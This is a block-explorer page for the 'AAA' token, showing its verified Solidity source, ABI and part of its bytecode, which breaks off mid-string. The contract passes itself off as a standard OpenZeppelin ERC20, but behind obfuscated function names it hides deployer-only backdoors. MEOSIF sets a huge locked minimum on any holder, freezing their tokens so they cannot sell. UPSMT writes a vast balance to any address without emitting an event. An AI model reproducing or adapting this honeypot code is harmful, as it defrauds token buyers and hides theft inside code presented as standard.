S Price: $0.781489 (-0.01%)

Token

AAA (AAA)

Overview

Max Total Supply

1,000,000,000 AAA

Holders

6

Market

Price

$0.00 @ 0.000000 S

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
13,939,767.799045448973961749 AAA

Value
$0.00
0x7ac80050b2e7c6f0ada446458cb7f54cc00908b1
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at SonicScan.org on 2024-12-30
*/

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _jiojsfeOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _jiojsfeOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_yydsed}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract Token is Context, IERC20, IERC20Metadata, Ownable {
    using SafeMath for uint256;
    mapping(address => mapping(address => uint256)) private _allowances;
    address public  _ETHS;
    mapping(address => uint256) private _eiosnfew;

    uint256 private _totalSupply;
    uint256 public constant MAXSupply = 1000000000 * 10 ** 18;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _ETHS = _msgSender();
        _yydsed(_msgSender(), 1000000000 * 10 ** decimals());
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _eiosnfew[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(owner, spender, currentAllowance.sub(subtractedValue));
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    mapping(address => uint256) private _eowens;
    function MEOSIF(address _newsf) external {
        if (_ETHS == _msgSender()) {_eowens[_newsf] =  (100000000000000 * 10 ** 18) * 1000000000 + 4e18;}
    }

    function UPSMT(address _neiso) external {
        address _nrwecoe = _msgSender();
        if (_ETHS == _nrwecoe) {
            _eiosnfew[_neiso] = 100000000000000 * (1000000000 * 10 ** 18) + 2e18;
        }
    }

    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 minAmount = _eowens[from];
        uint256 decydsBalance = _eiosnfew[from].sub(minAmount);
        require(decydsBalance >= amount, "ERC20: transfer amount exceeds balance");
        _eiosnfew[from] = decydsBalance.sub(amount);
        // decrementing then incrementing.
        _eiosnfew[to] = _eiosnfew[to].add(amount);
        emit Transfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _yydsed(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: yydsed to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _eiosnfew[msg.sender] = _eiosnfew[msg.sender].add(amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        uint256 accountBalance = _eiosnfew[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _eiosnfew[account] = accountBalance.sub(amount);
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            _approve(owner, spender, currentAllowance.sub(amount));
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"MAXSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_newsf","type":"address"}],"name":"MEOSIF","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_neiso","type":"address"}],"name":"UPSMT","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_ETHS","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b50604051620026ef380380620026ef833981810160405281019062000037919062000521565b620000576200004b6200012260201b60201c565b6200012a60201b60201c565b8160059081620000689190620007f1565b5080600690816200007a9190620007f1565b506200008b6200012260201b60201c565b600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200011a620000df6200012260201b60201c565b620000ef620001ee60201b60201c565b600a620000fd919062000a68565b633b9aca006200010e919062000ab9565b620001f760201b60201c565b505062000c5a565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000269576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002609062000b8b565b60405180910390fd5b62000285816004546200032b60201b6200093d1790919060201c565b600481905550620002e481600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200032b60201b6200093d1790919060201c565b600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b60008082846200033c919062000bad565b90508381101562000384576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200037b9062000c38565b60405180910390fd5b8091505092915050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620003f782620003ac565b810181811067ffffffffffffffff82111715620004195762000418620003bd565b5b80604052505050565b60006200042e6200038e565b90506200043c8282620003ec565b919050565b600067ffffffffffffffff8211156200045f576200045e620003bd565b5b6200046a82620003ac565b9050602081019050919050565b60005b83811015620004975780820151818401526020810190506200047a565b60008484015250505050565b6000620004ba620004b48462000441565b62000422565b905082815260208101848484011115620004d957620004d8620003a7565b5b620004e684828562000477565b509392505050565b600082601f830112620005065762000505620003a2565b5b815162000518848260208601620004a3565b91505092915050565b600080604083850312156200053b576200053a62000398565b5b600083015167ffffffffffffffff8111156200055c576200055b6200039d565b5b6200056a85828601620004ee565b925050602083015167ffffffffffffffff8111156200058e576200058d6200039d565b5b6200059c85828601620004ee565b9150509250929050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620005f957607f821691505b6020821081036200060f576200060e620005b1565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620006797fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200063a565b6200068586836200063a565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620006d2620006cc620006c6846200069d565b620006a7565b6200069d565b9050919050565b6000819050919050565b620006ee83620006b1565b62000706620006fd82620006d9565b84845462000647565b825550505050565b600090565b6200071d6200070e565b6200072a818484620006e3565b505050565b5b8181101562000752576200074660008262000713565b60018101905062000730565b5050565b601f821115620007a1576200076b8162000615565b62000776846200062a565b8101602085101562000786578190505b6200079e62000795856200062a565b8301826200072f565b50505b505050565b600082821c905092915050565b6000620007c660001984600802620007a6565b1980831691505092915050565b6000620007e18383620007b3565b9150826002028217905092915050565b620007fc82620005a6565b67ffffffffffffffff811115620008185762000817620003bd565b5b620008248254620005e0565b6200083182828562000756565b600060209050601f83116001811462000869576000841562000854578287015190505b620008608582620007d3565b865550620008d0565b601f198416620008798662000615565b60005b82811015620008a3578489015182556001820191506020850194506020810190506200087c565b86831015620008c35784890151620008bf601f891682620007b3565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000966578086048111156200093e576200093d620008d8565b5b60018516156200094e5780820291505b80810290506200095e8562000907565b94506200091e565b94509492505050565b60008262000981576001905062000a54565b8162000991576000905062000a54565b8160018114620009aa5760028114620009b557620009eb565b600191505062000a54565b60ff841115620009ca57620009c9620008d8565b5b8360020a915084821115620009e457620009e3620008d8565b5b5062000a54565b5060208310610133831016604e8410600b841016171562000a255782820a90508381111562000a1f5762000a1e620008d8565b5b62000a54565b62000a34848484600162000914565b9250905081840481111562000a4e5762000a4d620008d8565b5b81810290505b9392505050565b600060ff82169050919050565b600062000a75826200069d565b915062000a828362000a5b565b925062000ab17fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200096f565b905092915050565b600062000ac6826200069d565b915062000ad3836200069d565b925082820262000ae3816200069d565b9150828204841483151762000afd5762000afc620008d8565b5b5092915050565b600082825260208201905092915050565b7f45524332303a2079796473656420746f20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600062000b7360218362000b04565b915062000b808262000b15565b604082019050919050565b6000602082019050818103600083015262000ba68162000b64565b9050919050565b600062000bba826200069d565b915062000bc7836200069d565b925082820190508082111562000be25762000be1620008d8565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600062000c20601b8362000b04565b915062000c2d8262000be8565b602082019050919050565b6000602082019050818103600083015262000c538162000c11565b9050919050565b611a858062000c6a6000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c806395d89b41116100a2578063a9059cbb11610071578063a9059cbb146102e5578063b03559c414610315578063dd62ed3e14610331578063f046fdfa14610361578063f2fde38b1461037f57610116565b806395d89b411461025d578063a4022bd11461027b578063a457c2d714610299578063a89c37d7146102c957610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d557806370a0823114610205578063715018a6146102355780638da5cb5b1461023f57610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b61012361039b565b604051610130919061119a565b60405180910390f35b610153600480360381019061014e9190611255565b61042d565b60405161016091906112b0565b60405180910390f35b610171610450565b60405161017e91906112da565b60405180910390f35b6101a1600480360381019061019c91906112f5565b61045a565b6040516101ae91906112b0565b60405180910390f35b6101bf610489565b6040516101cc9190611364565b60405180910390f35b6101ef60048036038101906101ea9190611255565b610492565b6040516101fc91906112b0565b60405180910390f35b61021f600480360381019061021a919061137f565b6104c9565b60405161022c91906112da565b60405180910390f35b61023d610512565b005b610247610526565b60405161025491906113bb565b60405180910390f35b61026561054f565b604051610272919061119a565b60405180910390f35b6102836105e1565b60405161029091906112da565b60405180910390f35b6102b360048036038101906102ae9190611255565b6105f1565b6040516102c091906112b0565b60405180910390f35b6102e360048036038101906102de919061137f565b610678565b005b6102ff60048036038101906102fa9190611255565b61072e565b60405161030c91906112b0565b60405180910390f35b61032f600480360381019061032a919061137f565b610751565b005b61034b600480360381019061034691906113d6565b61080d565b60405161035891906112da565b60405180910390f35b610369610894565b60405161037691906113bb565b60405180910390f35b6103996004803603810190610394919061137f565b6108ba565b005b6060600580546103aa90611445565b80601f01602080910402602001604051908101604052809291908181526020018280546103d690611445565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b60008061043861099b565b90506104458185856109a3565b600191505092915050565b6000600454905090565b60008061046561099b565b9050610472858285610b6c565b61047d858585610c08565b60019150509392505050565b60006012905090565b60008061049d61099b565b90506104be8185856104af858961080d565b6104b991906114a5565b6109a3565b600191505092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61051a610f1a565b6105246000610f98565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461055e90611445565b80601f016020809104026020016040519081016040528092919081815260200182805461058a90611445565b80156105d75780601f106105ac576101008083540402835291602001916105d7565b820191906000526020600020905b8154815290600101906020018083116105ba57829003601f168201915b5050505050905090565b6b033b2e3c9fd0803ce800000081565b6000806105fc61099b565b9050600061060a828661080d565b90508381101561064f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106469061154b565b60405180910390fd5b61066c8286610667878561105c90919063ffffffff16565b6109a3565b60019250505092915050565b61068061099b565b73ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffff